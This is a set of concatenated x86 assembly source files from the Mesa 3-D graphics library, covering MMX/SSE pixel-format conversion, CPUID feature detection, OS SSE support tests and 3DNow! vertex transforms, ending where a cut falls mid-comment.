.type _generic_read_RGBA_span_BGRA8888_REV_SSE, @function
_generic_read_RGBA_span_BGRA8888_REV_SSE:
pushl %esi
pushl %ebx
pushl %ebp
#ifdef USE_INNER_EMMS
emms
#endif
LOAD_MASK(movq,%mm1,%mm2)
movl 16(%esp), %ebx /* source pointer */
movl 24(%esp), %edx /* number of pixels to copy */
movl 20(%esp), %ecx /* destination pointer */
testl %edx, %edx
jle .L35 /* Bail if there's nothing to do. */
/* Save %esp, then align it down to 16 bytes over a 16-byte scratch
 * area used by the movaps spill in the main loop.
 */
movl %esp, %ebp
subl $16, %esp
andl $0xfffffff0, %esp
/* esi = min(count, pixels needed to 16-byte-align the source). */
movl %ebx, %eax
movl %edx, %esi
negl %eax
andl $15, %eax
sarl $2, %eax
cmpl %edx, %eax
cmovle %eax, %esi
subl %esi, %edx
testl $1, %esi
je .L32
DO_ONE_PIXEL()
.L32:
testl $2, %esi
je .L31
movq (%ebx), %mm0
addl $8, %ebx
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
.L31:
movl %edx, %eax
shrl $2, %eax /* eax = number of 4-pixel iterations */
jmp .L33
.L34:
movaps (%ebx), %xmm0
addl $16, %ebx
/* This would be so much better if we could just move directly from
* an SSE register to an MMX register. Unfortunately, that
* functionality wasn't introduced until SSE2 with the MOVDQ2Q
* instruction.
*/
movaps %xmm0, (%esp)
movq (%esp), %mm0
movq 8(%esp), %mm5
movq %mm0, %mm3
movq %mm0, %mm4
movq %mm5, %mm6
movq %mm5, %mm7
pand %mm2, %mm3
pand %mm2, %mm6
psllq $16, %mm4
psllq $16, %mm7
psrlq $16, %mm3
psrlq $16, %mm6
pand %mm2, %mm4
pand %mm2, %mm7
pand %mm1, %mm0
pand %mm1, %mm5
por %mm4, %mm3
por %mm7, %mm6
por %mm3, %mm0
por %mm6, %mm5
movq %mm0, (%ecx)
movq %mm5, 8(%ecx)
addl $16, %ecx
subl $1, %eax
.L33:
jne .L34
#ifdef USE_INNER_EMMS
emms
#endif
movl %ebp, %esp
/* At this point there are either [0, 3] pixels remaining to be
* converted.
*/
testl $2, %edx
je .L36
movq (%ebx), %mm0
addl $8, %ebx
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
.L36:
testl $1, %edx
je .L35
DO_ONE_LAST_PIXEL()
.L35:
popl %ebp
popl %ebx
popl %esi
ret
.size _generic_read_RGBA_span_BGRA8888_REV_SSE, .-_generic_read_RGBA_span_BGRA8888_REV_SSE
/**
* SSE2 optimized version of the BGRA8888_REV to RGBA copy routine.
*/
.text
/*
 * _generic_read_RGBA_span_BGRA8888_REV_SSE2(src, dst, count)
 *
 * cdecl, x86-32.  After the two pushes below the arguments sit at
 * 12(%esp)=src, 16(%esp)=dst, 20(%esp)=pixel count.  Pure-SSE2 variant
 * of the routine above: pslldq/psrldq shift whole bytes, so the $2
 * shift counts here correspond to the $16-bit psllq/psrlq shifts of
 * the MMX versions.  Head converts 0-3 pixels to align the source for
 * movdqa; main loop does 4 pixels per iteration; tail does the rest.
 * Clobbers %eax, %ecx, %edx, %esi (restored), xmm0-xmm4, EFLAGS.
 * No EMMS is needed since no MMX register is touched.
 */
.globl _generic_read_RGBA_span_BGRA8888_REV_SSE2
.hidden _generic_read_RGBA_span_BGRA8888_REV_SSE2
.type _generic_read_RGBA_span_BGRA8888_REV_SSE2, @function
_generic_read_RGBA_span_BGRA8888_REV_SSE2:
pushl %esi
pushl %ebx
LOAD_MASK(movdqu,%xmm1,%xmm2)
movl 12(%esp), %ebx /* source pointer */
movl 20(%esp), %edx /* number of pixels to copy */
movl 16(%esp), %ecx /* destination pointer */
movl %ebx, %eax
movl %edx, %esi
testl %edx, %edx
jle .L46 /* Bail if there's nothing to do. */
/* If the source pointer isn't a multiple of 16 we have to process
* a few pixels the "slow" way to get the address aligned for
* the SSE fetch intsructions.
*/
negl %eax
andl $15, %eax
sarl $2, %eax
cmpl %edx, %eax
cmovbe %eax, %esi /* esi = min(count, pixels to align source) */
subl %esi, %edx
testl $1, %esi
je .L41
DO_ONE_PIXEL()
.L41:
testl $2, %esi
je .L40
movq (%ebx), %xmm0 /* 64-bit load: two pixels, upper half zeroed */
addl $8, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movq %xmm0, (%ecx)
addl $8, %ecx
.L40:
/* Would it be worth having a specialized version of this loop for
* the case where the destination is 16-byte aligned? That version
* would be identical except that it could use movedqa instead of
* movdqu.
*/
movl %edx, %eax
shrl $2, %eax /* eax = number of 4-pixel iterations */
jmp .L42
.L43:
movdqa (%ebx), %xmm0
addl $16, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movdqu %xmm0, (%ecx)
addl $16, %ecx
subl $1, %eax
.L42:
jne .L43
/* There may be upto 3 pixels remaining to be copied. Take care
* of them now. We do the 2 pixel case first because the data
* will be aligned.
*/
testl $2, %edx
je .L47
movq (%ebx), %xmm0
addl $8, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movq %xmm0, (%ecx)
addl $8, %ecx
.L47:
testl $1, %edx
je .L46
DO_ONE_LAST_PIXEL()
.L46:
popl %ebx
popl %esi
ret
.size _generic_read_RGBA_span_BGRA8888_REV_SSE2, .-_generic_read_RGBA_span_BGRA8888_REV_SSE2
/* Constants for the RGB565 -> RGBA expansion below.  Each L/H pair is
 * pushed (H first, then L) and loaded as one 64-bit MMX value, so L is
 * the low dword and H the high dword of the register.  As a mask over
 * four 16-bit words (after pshufw replicates one RGB565 pixel into all
 * four words): word0 keeps the red field (0xf800), word1 the green
 * field (0x07e0), word2 the blue field (0x001f), word3 is zero.
 */
#define MASK_565_L 0x07e0f800
#define MASK_565_H 0x0000001f
/* Setting SCALE_ADJUST to 5 gives a perfect match with the
* classic C implementation in Mesa. Setting SCALE_ADJUST
* to 0 is slightly faster but at a small cost to accuracy.
*/
#define SCALE_ADJUST 5
#if SCALE_ADJUST == 5
#define PRESCALE_L 0x00100001
#define PRESCALE_H 0x00000200
#define SCALE_L 0x40C620E8
#define SCALE_H 0x0000839d
#elif SCALE_ADJUST == 0
#define PRESCALE_L 0x00200001
#define PRESCALE_H 0x00000800
#define SCALE_L 0x01040108
#define SCALE_H 0x00000108
#else
#error SCALE_ADJUST must either be 5 or 0.
#endif
/* Word3 = 0x00ff: OR'd in before packuswb so the packed alpha byte
 * saturates to 0xff.
 */
#define ALPHA_L 0x00000000
#define ALPHA_H 0x00ff0000
/**
* MMX optimized version of the RGB565 to RGBA copy routine.
*/
.text
/*
 * _generic_read_RGBA_span_RGB565_MMX(src, dst, count)
 *
 * cdecl, x86-32; no registers are saved, so 4(%esp)=src, 8(%esp)=dst,
 * 12(%esp)=pixel count throughout.  mm5 = per-word field masks,
 * mm6 = prescale, mm7 = scale, mm3 = alpha (see the MASK_565 /
 * PRESCALE / SCALE / ALPHA constants above).  The main loop expands
 * 4 pixels per iteration; the tail handles the remaining 0-3.
 * Clobbers %eax, %ecx, %edx, mm0, mm2-mm7, EFLAGS.
 *
 * Fixes vs. the previous revision:
 *  - "jl" instead of "jle" after "sarl $2, %ecx": a count of 1..3
 *    shifts to zero and must fall through to the tail handling at
 *    .L04/.L01 rather than bailing out and dropping those pixels.
 *    (The comment and the tail code both show only negative counts
 *    were ever meant to bail.)
 *  - "movzwl" instead of the non-standard "movzxw" mnemonic, which
 *    newer assemblers reject.
 */
.globl _generic_read_RGBA_span_RGB565_MMX
.hidden _generic_read_RGBA_span_RGB565_MMX
.type _generic_read_RGBA_span_RGB565_MMX, @function
_generic_read_RGBA_span_RGB565_MMX:
#ifdef USE_INNER_EMMS
emms
#endif
movl 4(%esp), %eax /* source pointer */
movl 8(%esp), %edx /* destination pointer */
movl 12(%esp), %ecx /* number of pixels to copy */
/* Build the four 64-bit constants on the stack (high dword pushed
 * first), then restore %esp.
 */
pushl $MASK_565_H
pushl $MASK_565_L
movq (%esp), %mm5
pushl $PRESCALE_H
pushl $PRESCALE_L
movq (%esp), %mm6
pushl $SCALE_H
pushl $SCALE_L
movq (%esp), %mm7
pushl $ALPHA_H
pushl $ALPHA_L
movq (%esp), %mm3
addl $32,%esp
sarl $2, %ecx /* ecx = number of 4-pixel iterations */
jl .L01 /* Bail early if the count is negative. */
jmp .L02
.L03:
/* Fetch 4 RGB565 pixels into %mm4. Distribute the first and
* second pixels into the four words of %mm0 and %mm2.
*/
movq (%eax), %mm4
addl $8, %eax
pshufw $0x00, %mm4, %mm0
pshufw $0x55, %mm4, %mm2
/* Mask the pixels so that each word of each register contains only
* one color component.
*/
pand %mm5, %mm0
pand %mm5, %mm2
/* Adjust the component values so that they are as small as possible,
* but large enough so that we can multiply them by an unsigned 16-bit
* number and get a value as large as 0x00ff0000.
*/
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
/* Scale the input component values to be on the range
* [0, 0x00ff0000]. This it the real magic of the whole routine.
*/
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
/* Always set the alpha value to 0xff.
*/
por %mm3, %mm0
por %mm3, %mm2
/* Pack the 16-bit values to 8-bit values and store the converted
* pixel data.
*/
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
/* Same expansion for the third and fourth pixels of %mm4. */
pshufw $0xaa, %mm4, %mm0
pshufw $0xff, %mm4, %mm2
pand %mm5, %mm0
pand %mm5, %mm2
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
por %mm3, %mm0
por %mm3, %mm2
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
subl $1, %ecx
.L02:
jne .L03
/* At this point there can be at most 3 pixels left to process. If
* there is either 2 or 3 left, process 2.
*/
movl 12(%esp), %ecx
testl $0x02, %ecx
je .L04
movd (%eax), %mm4 /* 32-bit load: two RGB565 pixels */
addl $4, %eax
pshufw $0x00, %mm4, %mm0
pshufw $0x55, %mm4, %mm2
pand %mm5, %mm0
pand %mm5, %mm2
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
por %mm3, %mm0
por %mm3, %mm2
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
.L04:
/* At this point there can be at most 1 pixel left to process.
* Process it if needed.
*/
testl $0x01, %ecx
je .L01
movzwl (%eax), %ecx /* zero-extended 16-bit load of the last pixel */
movd %ecx, %mm4
pshufw $0x00, %mm4, %mm0
pand %mm5, %mm0
pmullw %mm6, %mm0
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
#endif
pmulhuw %mm7, %mm0
por %mm3, %mm0
packuswb %mm0, %mm0
movd %mm0, (%edx)
.L01:
#ifdef USE_INNER_EMMS
emms
#endif
ret
#endif /* !defined(__DJGPP__) && !defined(__MINGW32__) */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 5,335
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/common_x86_asm.S
|
/*
* Mesa 3-D graphics library
* Version: 6.3
*
* Copyright (C) 1999-2004 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* Check extended CPU capabilities. Now justs returns the raw CPUID
* feature information, allowing the higher level code to interpret the
* results.
*
* Written by Holger Waechtler <holger@akaflieg.extern.tu-berlin.de>
*
* Cleaned up and simplified by Gareth Hughes <gareth@valinux.com>
*
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "common_x86_features.h"
SEG_TEXT
/*
 * _mesa_x86_has_cpuid(void)
 *
 * Detects CPUID support by toggling the ID flag (bit 21) of EFLAGS and
 * checking whether the change sticks.  On exit %al holds the SETNE
 * result (1 if EFLAGS changed, i.e. CPUID is available) XOR'd with
 * 0xff.  NOTE(review): the upper bytes of %eax still contain the
 * sampled EFLAGS word at this point — confirm against the C caller
 * how the return value is interpreted.  Clobbers EAX, ECX, EFLAGS.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_has_cpuid)
HIDDEN(_mesa_x86_has_cpuid)
GLNAME(_mesa_x86_has_cpuid):
/* Test for the CPUID command. If the ID Flag bit in EFLAGS
* (bit 21) is writable, the CPUID command is present */
PUSHF_L
POP_L (EAX)
MOV_L (EAX, ECX) /* ecx = original EFLAGS */
XOR_L (CONST(0x00200000), EAX) /* toggle the ID flag (bit 21) */
PUSH_L (EAX)
POPF_L
PUSHF_L
POP_L (EAX) /* eax = EFLAGS after the write-back */
/* Verify the ID Flag bit has been written. */
CMP_L (ECX, EAX)
SETNE (AL)
XOR_L (CONST(0xff), EAX)
RET
/*
 * _mesa_x86_cpuid(op, *eax, *ebx, *ecx, *edx)
 *
 * Executes CPUID with EAX = op and stores all four result registers
 * through the caller-supplied pointers.  Argument offsets below are
 * relative to %esp after the two pushes (op was at 4(%esp) on entry).
 * EBX and EDI are preserved; EAX, ECX, EDX and EFLAGS are clobbered.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid)
HIDDEN(_mesa_x86_cpuid)
GLNAME(_mesa_x86_cpuid):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EDI)
PUSH_L (EBX) /* EBX is callee-saved and clobbered by CPUID */
CPUID
MOV_L (REGOFF(16, ESP), EDI) /* *eax */
MOV_L (EAX, REGIND(EDI))
MOV_L (REGOFF(20, ESP), EDI) /* *ebx */
MOV_L (EBX, REGIND(EDI))
MOV_L (REGOFF(24, ESP), EDI) /* *ecx */
MOV_L (ECX, REGIND(EDI))
MOV_L (REGOFF(28, ESP), EDI) /* *edx */
MOV_L (EDX, REGIND(EDI))
POP_L (EBX)
POP_L (EDI)
RET
/*
 * _mesa_x86_cpuid_eax(op): run CPUID with EAX = op and return the
 * resulting EAX.  EBX is preserved; ECX, EDX, EFLAGS are clobbered.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_eax)
HIDDEN(_mesa_x86_cpuid_eax)
GLNAME(_mesa_x86_cpuid_eax):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
POP_L (EBX)
RET
/*
 * _mesa_x86_cpuid_ebx(op): run CPUID with EAX = op and return the
 * resulting EBX.  EBX is preserved; ECX, EDX, EFLAGS are clobbered.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_ebx)
HIDDEN(_mesa_x86_cpuid_ebx)
GLNAME(_mesa_x86_cpuid_ebx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (EBX, EAX) /* return EBX */
POP_L (EBX)
RET
/*
 * _mesa_x86_cpuid_ecx(op): run CPUID with EAX = op and return the
 * resulting ECX.  EBX is preserved; EDX, EFLAGS are clobbered.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_ecx)
HIDDEN(_mesa_x86_cpuid_ecx)
GLNAME(_mesa_x86_cpuid_ecx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (ECX, EAX) /* return ECX */
POP_L (EBX)
RET
/*
 * _mesa_x86_cpuid_edx(op): run CPUID with EAX = op and return the
 * resulting EDX.  EBX is preserved; ECX, EFLAGS are clobbered.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_edx)
HIDDEN(_mesa_x86_cpuid_edx)
GLNAME(_mesa_x86_cpuid_edx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (EDX, EAX) /* return EDX */
POP_L (EBX)
RET
#ifdef USE_SSE_ASM
/* Execute an SSE instruction to see if the operating system correctly
* supports SSE. A signal handler for SIGILL should have been set
* before calling this function, otherwise this could kill the client
* application.
*
* -----> !!!! ATTENTION DEVELOPERS !!!! <-----
*
* If you're debugging with gdb and you get stopped in this function,
* just type 'continue'! Execution will proceed normally.
* See freedesktop.org bug #1709 for more info.
*/
/*
 * _mesa_test_os_sse_support(void)
 *
 * Executes a single SSE instruction; per the note above, a SIGILL
 * handler must already be installed.  If the OS does not enable SSE
 * state, XORPS faults; otherwise the function simply returns.
 */
ALIGNTEXT4
GLOBL GLNAME( _mesa_test_os_sse_support )
HIDDEN(_mesa_test_os_sse_support)
GLNAME( _mesa_test_os_sse_support ):
XORPS ( XMM0, XMM0 )
RET
/* Perform an SSE divide-by-zero to see if the operating system
* correctly supports unmasked SIMD FPU exceptions. Signal handlers for
* SIGILL and SIGFPE should have been set before calling this function,
* otherwise this could kill the client application.
*/
/*
 * _mesa_test_os_sse_exception_support(void)
 *
 * Per the note above, SIGILL/SIGFPE handlers must already be set.
 * Unmasks the SIMD divide-by-zero exception in MXCSR, performs
 * 1.0/0.0 with DIVPS (AT&T order: XMM1 /= XMM0, where XMM0 is all
 * zeros and XMM1 holds four 1.0f values built on the stack), then
 * restores the caller's MXCSR.  LEAVE discards both the two MXCSR
 * save slots and the 16 bytes pushed for the 1.0f operands.
 * Clobbers XMM0, XMM1 and MXCSR state.
 */
ALIGNTEXT4
GLOBL GLNAME( _mesa_test_os_sse_exception_support )
HIDDEN(_mesa_test_os_sse_exception_support)
GLNAME( _mesa_test_os_sse_exception_support ):
PUSH_L ( EBP )
MOV_L ( ESP, EBP )
SUB_L ( CONST( 8 ), ESP )
/* Save the original MXCSR register value.
*/
STMXCSR ( REGOFF( -4, EBP ) )
/* Unmask the divide-by-zero exception and perform one.
*/
STMXCSR ( REGOFF( -8, EBP ) )
AND_L ( CONST( 0xfffffdff ), REGOFF( -8, EBP ) ) /* clear the ZM mask bit */
LDMXCSR ( REGOFF( -8, EBP ) )
XORPS ( XMM0, XMM0 )
PUSH_L ( CONST( 0x3f800000 ) ) /* 1.0f, pushed four times */
PUSH_L ( CONST( 0x3f800000 ) )
PUSH_L ( CONST( 0x3f800000 ) )
PUSH_L ( CONST( 0x3f800000 ) )
MOVUPS ( REGIND( ESP ), XMM1 )
DIVPS ( XMM0, XMM1 ) /* 1.0/0.0: raises unmasked #Z if supported */
/* Restore the original MXCSR register value.
*/
LDMXCSR ( REGOFF( -4, EBP ) )
LEAVE
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 18,716
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform3.S
|
/* $Id: 3dnow_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
/*
 * _mesa_3dnow_transform_points3_general(dest, matrix, source)
 * (args via ARG_DEST/ARG_MATRIX/ARG_SOURCE from xform_args.h)
 *
 * Full 4x4 transform of 3-component points: for each source (x0,x1,x2)
 * produces the 4-component result using matrix columns m0..m15 (4-byte
 * floats, byte offsets 0..60), with the translation row m12..m15 added
 * unconditionally — i.e. an implicit w = 1.  Sets dest->size = 4 and
 * ORs VEC_SIZE_4 into dest->flags; copies the source count; honours
 * the source stride.  3DNow! code; ends with FEMMS.  Clobbers EAX,
 * ECX, EDX, MM0-MM5, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_general )
HIDDEN(_mesa_3dnow_transform_points3_general)
GLNAME( _mesa_3dnow_transform_points3_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX ) /* edx = dest vertex pointer */
MOV_L ( ESI, ECX ) /* ecx = matrix pointer */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI ) /* esi = vertex count */
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI ) /* edi = source stride */
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* eax = source vertex pointer */
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPGR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM2 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
MOVQ ( MM2, MM5 ) /* x2 | x2 */
PUNPCKHDQ ( MM1, MM1 ) /* x1 | x1 */
PFMUL ( REGOFF(32, ECX), MM2 ) /* x2*m9 | x2*m8 */
MOVQ ( MM0, MM3 ) /* x0 | x0 */
PFMUL ( REGOFF(40, ECX), MM5 ) /* x2*m11 | x2*m10 */
MOVQ ( MM1, MM4 ) /* x1 | x1 */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
PFADD ( REGOFF(48, ECX), MM2 ) /* x2*m9+m13 | x2*m8+m12 */
PFMUL ( REGOFF(16, ECX), MM1 ) /* x1*m5 | x1*m4 */
PFADD ( REGOFF(56, ECX), MM5 ) /* x2*m11+m15 | x2*m10+m14 */
PFADD ( MM0, MM1 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(8, ECX), MM3 ) /* x0*m3 | x0*m2 */
PFADD ( MM1, MM2 ) /* r1 | r0 */
PFMUL ( REGOFF(24, ECX), MM4 ) /* x1*m7 | x1*m6 */
ADD_L ( CONST(16), EDX ) /* next output vertex */
PFADD ( MM3, MM4 ) /* x0*m3+x1*m7 | x0*m2+x1*m6 */
MOVQ ( MM2, REGOFF(-16, EDX) ) /* write r0, r1 */
PFADD ( MM4, MM5 ) /* r3 | r2 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_perspective(dest, matrix, source)
 *
 * Transform by a perspective-projection-shaped matrix: per the inline
 * comments, r0 = x0*m00 + x2*m20, r1 = x1*m11 + x2*m21,
 * r2 = x2*m22 + m32, r3 = -x2.  Only the matrix entries at offsets
 * 0, 20, 32/36, 40 and 56 are read; all other entries are assumed to
 * match the perspective pattern.  Sets dest->size = 4, ORs VEC_SIZE_4
 * into dest->flags, copies the count, honours the source stride.
 * 3DNow! code; ends with FEMMS.  Clobbers EAX, ECX, EDX, MM0-MM7,
 * EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_perspective )
HIDDEN(_mesa_3dnow_transform_points3_perspective)
GLNAME( _mesa_3dnow_transform_points3_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(32, ECX), MM1 ) /* m21 | m20 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PXOR ( MM7, MM7 ) /* 0 | 0 */
MOVQ ( MM5, MM6 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFSUB ( MM5, MM7 ) /* | -x2 */
PFMUL ( MM2, MM6 ) /* | x2*m22 */
PUNPCKLDQ ( MM5, MM5 ) /* x2 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM1, MM5 ) /* x2*m21 | x2*m20 */
PFADD ( MM3, MM6 ) /* | x2*m22+m32 */
PFADD ( MM4, MM5 ) /* x1*m11+x2*m21 | x0*m00+x2*m20 */
MOVQ ( MM5, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVD ( MM6, REGOFF(-8, EDX) ) /* write r2 */
MOVD ( MM7, REGOFF(-4, EDX) ) /* write r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_3d(dest, matrix, source)
 *
 * 3x3-plus-translation transform producing 3-component results:
 * r0/r1 from x0/x1/x2 against matrix columns m0..m9 with m12/m13
 * added, r2 accumulated via PFACC from x0*m2, x1*m6, x2*m10 and m14.
